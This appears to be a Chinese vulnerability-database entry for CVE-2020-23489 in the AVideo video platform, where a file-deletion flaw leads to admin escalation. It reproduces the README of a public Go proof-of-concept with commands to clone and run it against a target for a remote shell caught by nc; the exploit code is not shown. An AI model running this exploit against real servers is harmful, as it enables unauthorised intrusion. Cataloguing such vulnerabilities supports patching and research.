关联漏洞
标题:
Wwbn Avideo 安全漏洞
(CVE-2020-23489)
描述:Wwbn Avideo是Wwbn团队的一个由PHP编写的视频平台建站系统。 Avideo 8.9之前版本存在安全漏洞,该漏洞源于import.json.php文件有文件删除漏洞。这允许删除configuration.php,这将导致某些特权检查不到位,因此用户可以将特权升级为admin。
描述
RCE exploit for AVideo < 8.9 (CVE-2020-23489 & CVE-2020-23490)
介绍
# AVideo3xploit.go
RCE exploit for [AVideo](https://github.com/WWBN/AVideo/)
```
root@kali:~# go get github.com/fatih/color
root@kali:~# git clone https://github.com/ahussam/AVideo3xploit.git
root@kali:~# cd AVideo3xploit
root@kali:~/AVideo3xploit# go run AVideo3xploit.go http://[target]/avideo/ username password
```
You should get a connection on your nc
## Write-up
https://cube01.io/blog/Avideo-Remote-Code-Execution.html
## CVE
CVE-2020-23489 & CVE-2020-23490
文件快照
[4.0K] /data/pocs/611ebe00cf46acb9aaabcae62a9350af289908de
├── [360K] av-5.png
├── [4.6K] AVideo3xploit.go
└── [ 501] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。